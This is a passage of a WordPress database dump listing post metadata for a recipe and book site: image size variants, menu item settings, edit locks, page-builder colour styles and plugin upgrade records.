:4:\"file\";s:17:\"9-1-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:15:\"9-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:16:\"9-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:16:\"9-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:17:\"9-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:15:\"9-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:15:\"9-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:15:\"9-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:15:\"9-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:15:\"9-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:15:\"9-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:7:\"9-1.jpg\";}'),(13834,5331,'_wp_attached_file','2020/04/10-1-scaled.jpg'),(13835,5331,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:23:\"2020/04/10-1-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"10-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:17:\"10-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"10-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"10-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:16:\"10-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:16:\"10-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:17:\"10-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:18:\"10-1-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:16:\"10-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:17:\"10-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:17:\"10-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:18:\"10-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:16:\"10-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:16:\"10-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:16:\"10-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:16:\"10-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:16:\"10-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:16:\"10-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:8:\"10-1.jpg\";}'),(14203,5435,'_cdp_counter','2'),(14202,5435,'_cdp_origin_title','jam jar 3 way Jam Jar salad 3 ways #[Counter]'),(14201,5435,'_cdp_origin_site','-1'),(14200,5435,'_cdp_origin','5137'),(14240,5441,'_wp_attached_file','2023/09/revslider'),(14241,5441,'_wp_attachment_context','upgrader'),(13869,5340,'_menu_item_type','post_type'),(13870,5340,'_menu_item_menu_item_parent','0'),(13871,5340,'_menu_item_object_id','5282'),(13872,5340,'_menu_item_object','page'),(13873,5340,'_menu_item_target',''),(13874,5340,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(13875,5340,'_menu_item_xfn',''),(13876,5340,'_menu_item_url',''),(13878,5341,'_menu_item_type','post_type'),(13879,5341,'_menu_item_menu_item_parent','0'),(13880,5341,'_menu_item_object_id','5193'),(13881,5341,'_menu_item_object','page'),(13882,5341,'_menu_item_target',''),(13883,5341,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(13884,5341,'_menu_item_xfn',''),(13885,5341,'_menu_item_url',''),(13887,5342,'_menu_item_type','post_type'),(13888,5342,'_menu_item_menu_item_parent','0'),(13889,5342,'_menu_item_object_id','5145'),(13890,5342,'_menu_item_object','page'),(13891,5342,'_menu_item_target',''),(13892,5342,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(13893,5342,'_menu_item_xfn',''),(13894,5342,'_menu_item_url',''),(13896,5343,'_menu_item_type','post_type'),(13897,5343,'_menu_item_menu_item_parent','0'),(13898,5343,'_menu_item_object_id','3776'),(13899,5343,'_menu_item_object','page'),(13900,5343,'_menu_item_target',''),(13901,5343,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(13902,5343,'_menu_item_xfn',''),(13903,5343,'_menu_item_url',''),(13905,5344,'_menu_item_type','post_type'),(13906,5344,'_menu_item_menu_item_parent','0'),(13907,5344,'_menu_item_object_id','4863'),(13908,5344,'_menu_item_object','page'),(13909,5344,'_menu_item_target',''),(13910,5344,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(13911,5344,'_menu_item_xfn',''),(13912,5344,'_menu_item_url',''),(13914,5345,'_menu_item_type','post_type'),(13915,5345,'_menu_item_menu_item_parent','0'),(13916,5345,'_menu_item_object_id','4895'),(13917,5345,'_menu_item_object','page'),(13918,5345,'_menu_item_target',''),(13919,5345,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(13920,5345,'_menu_item_xfn',''),(13921,5345,'_menu_item_url',''),(13923,5346,'_menu_item_type','post_type'),(13924,5346,'_menu_item_menu_item_parent','0'),(13925,5346,'_menu_item_object_id','4884'),(13926,5346,'_menu_item_object','page'),(13927,5346,'_menu_item_target',''),(13928,5346,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(13929,5346,'_menu_item_xfn',''),(13930,5346,'_menu_item_url',''),(13932,5282,'qodef_sidebar_layout_meta','sidebar-33-right'),(13933,4898,'_thumbnail_id','906'),(13936,4765,'_wp_old_date','2020-04-05'),(13938,5350,'_edit_lock','1587632920:1'),(13941,5350,'_thumbnail_id','5040'),(13942,5350,'_edit_last','1'),(13944,5350,'qodef_page_content_behind_header_meta','no'),(13945,5350,'qodef_boxed_background_image_attachment_meta','fixed'),(13946,5350,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(13947,5350,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(13948,5350,'qodef_video_type_meta','social_networks'),(13949,5350,'qodef_audio_type_meta','social_networks'),(13950,5350,'qodef_post_skin','qodef-post-light-skin'),(13951,5350,'qodef_disable_vertical_header_background_image_meta','no'),(13952,5350,'qodef_disable_header_widget_logo_area_meta','no'),(13953,5350,'qodef_disable_header_widget_menu_area_meta','no'),(13954,5350,'slide_template','default'),(13955,5350,'rs_page_bg_color','#ffffff'),(13956,5352,'_edit_lock','1587682668:1'),(13959,5352,'_thumbnail_id','906'),(13960,5352,'_edit_last','1'),(13962,5352,'qodef_page_content_behind_header_meta','no'),(13963,5352,'qodef_boxed_background_image_attachment_meta','fixed'),(13964,5352,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(13965,5352,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(13966,5352,'qodef_video_type_meta','social_networks'),(13967,5352,'qodef_audio_type_meta','social_networks'),(13968,5352,'qodef_post_skin','qodef-post-light-skin'),(13969,5352,'qodef_disable_vertical_header_background_image_meta','no'),(13970,5352,'qodef_disable_header_widget_logo_area_meta','no'),(13971,5352,'qodef_disable_header_widget_menu_area_meta','no'),(13972,5352,'slide_template','default'),(13973,5352,'rs_page_bg_color','#ffffff'),(13974,869,'_edit_lock','1587633537:1'),(13975,5354,'_edit_lock','1587648848:1'),(13976,5354,'_oembed_5618c895f887bb6c65181165264ae939',''),(13977,5354,'_oembed_time_5618c895f887bb6c65181165264ae939','1587646422'),(13978,5355,'_wp_attached_file','2020/04/Peach-Photo-Women-Quote-Instagram-Post-2.jpg'),(13979,5355,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:1080;s:4:\"file\";s:52:\"2020/04/Peach-Photo-Women-Quote-Instagram-Post-2.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:52:\"Peach-Photo-Women-Quote-Instagram-Post-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:54:\"Peach-Photo-Women-Quote-Instagram-Post-2-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:52:\"Peach-Photo-Women-Quote-Instagram-Post-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:52:\"Peach-Photo-Women-Quote-Instagram-Post-2-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:52:\"Peach-Photo-Women-Quote-Instagram-Post-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:52:\"Peach-Photo-Women-Quote-Instagram-Post-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:52:\"Peach-Photo-Women-Quote-Instagram-Post-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:53:\"Peach-Photo-Women-Quote-Instagram-Post-2-1080x550.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:53:\"Peach-Photo-Women-Quote-Instagram-Post-2-550x1080.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:52:\"Peach-Photo-Women-Quote-Instagram-Post-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:52:\"Peach-Photo-Women-Quote-Instagram-Post-2-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:52:\"Peach-Photo-Women-Quote-Instagram-Post-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:52:\"Peach-Photo-Women-Quote-Instagram-Post-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:52:\"Peach-Photo-Women-Quote-Instagram-Post-2-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:52:\"Peach-Photo-Women-Quote-Instagram-Post-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(13980,5354,'_edit_last','1'),(13981,5354,'qodef_page_content_behind_header_meta','no'),(13982,5354,'qodef_boxed_background_image_attachment_meta','fixed'),(13983,5354,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(13984,5354,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(13985,5354,'qodef_video_type_meta','social_networks'),(13986,5354,'qodef_audio_type_meta','social_networks'),(13987,5354,'qodef_post_skin','qodef-post-light-skin'),(13988,5354,'qodef_disable_vertical_header_background_image_meta','no'),(13989,5354,'qodef_disable_header_widget_logo_area_meta','no'),(13990,5354,'qodef_disable_header_widget_menu_area_meta','no'),(13991,5354,'slide_template','default'),(13992,5354,'rs_page_bg_color','#ffffff'),(13993,5357,'_wp_attached_file','2020/04/MG_0466-scaled.jpg'),(13994,5357,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:26:\"2020/04/MG_0466-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"MG_0466-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"MG_0466-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"MG_0466-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"MG_0466-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:19:\"MG_0466-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:19:\"MG_0466-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:21:\"MG_0466-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:21:\"MG_0466-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:19:\"MG_0466-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:20:\"MG_0466-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"MG_0466-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:21:\"MG_0466-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"MG_0466-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:19:\"MG_0466-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"MG_0466-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:19:\"MG_0466-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"MG_0466-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"MG_0466-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1426773074\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"28\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:11:\"MG_0466.jpg\";}'),(13997,5354,'_wp_old_date','2020-04-23'),(13998,5354,'_thumbnail_id','5357'),(14024,1117,'qodef_blog_category_meta','recipes'),(14025,5282,'qodef_blog_category_meta','articles-news'),(14026,5282,'qodef_show_posts_per_page_meta','5'),(14027,1117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:1:{s:10:\"shortcodes\";a:1:{s:29:\"1588157289763-4833a7b8-ea6e-5\";a:3:{s:3:\"tag\";s:13:\"vc_basic_grid\";s:4:\"atts\";a:5:{s:9:\"post_type\";s:4:\"post\";s:9:\"max_items\";s:1:\"5\";s:13:\"element_width\";s:2:\"12\";s:7:\"grid_id\";s:36:\"vc_gid:1588157289763-4833a7b8-ea6e-5\";s:10:\"taxonomies\";s:2:\"92\";}s:7:\"content\";s:0:\"\";}}}}'),(14031,5369,'_wpb_shortcodes_custom_css','.vc_custom_1587684320269{background-color: #f75013 !important;}'),(14033,5370,'_wpb_shortcodes_custom_css','.vc_custom_1587684393949{background-color: #f75013 !important;}'),(14034,5220,'_wp_old_slug','apple-ad'),(14035,5217,'_wp_old_slug','uk-ad'),(14036,5214,'_wp_old_slug','ad-us'),(14037,5220,'_wp_old_slug','book-slider-apple'),(14038,5378,'_wp_attached_file','2020/04/New-book-slider-UK-Ama.jpg'),(14039,5378,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:4:\"file\";s:34:\"2020/04/New-book-slider-UK-Ama.jpg\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"New-book-slider-UK-Ama-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"New-book-slider-UK-Ama-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"New-book-slider-UK-Ama-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"New-book-slider-UK-Ama-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:34:\"New-book-slider-UK-Ama-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:34:\"New-book-slider-UK-Ama-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:34:\"New-book-slider-UK-Ama-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:35:\"New-book-slider-UK-Ama-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:35:\"New-book-slider-UK-Ama-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:36:\"New-book-slider-UK-Ama-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:34:\"New-book-slider-UK-Ama-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:34:\"New-book-slider-UK-Ama-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"New-book-slider-UK-Ama-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:34:\"New-book-slider-UK-Ama-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:34:\"New-book-slider-UK-Ama-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:34:\"New-book-slider-UK-Ama-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(14040,5379,'_wp_attached_file','2020/04/book-slider-AmazonUS-1.jpg'),(14041,5379,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:1080;s:4:\"file\";s:34:\"2020/04/book-slider-AmazonUS-1.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"book-slider-AmazonUS-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"book-slider-AmazonUS-1-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"book-slider-AmazonUS-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"book-slider-AmazonUS-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:34:\"book-slider-AmazonUS-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:34:\"book-slider-AmazonUS-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:34:\"book-slider-AmazonUS-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:35:\"book-slider-AmazonUS-1-1080x550.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:35: